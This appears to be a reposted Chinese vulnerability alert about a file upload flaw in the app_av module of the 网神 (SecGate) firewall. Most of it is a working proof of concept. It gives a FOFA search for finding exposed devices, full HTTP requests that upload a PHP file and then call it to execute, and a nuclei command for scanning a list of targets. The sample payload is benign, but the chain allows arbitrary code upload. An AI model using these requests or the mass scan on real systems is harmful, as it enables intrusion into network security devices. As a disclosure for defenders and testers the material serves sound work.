0x02 漏洞描述
网神 防火墙 app_av 存在文件上传漏洞。
0x03 漏洞复现
fofa:fid="1Lh1LHi6yfkhiO83I59AYg=="
1.执行poc进行获取cookie,文件上传无害文件得到结果
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
POST /?g=app_av HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 440
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
Cookie: __s_sessionid__={{cookie}}
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="reqfile";filename="{{cookie}}.php"
Content-Type: text/plain
echo(md5(233));unlink(__FILE__);
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
app_av_import_save
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="certfile_r"
file
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
GET /attachements/{{cookie}}.php HTTP/1.1
Host:
Cookie: __s_sessionid__={{cookie}};
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t wangshen-secgate-app_av-fileupload.yaml -l subs.txt -stats
原文始发于微信公众号(融云攻防实验室):漏洞预警 网神 防火墙 app_av 文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论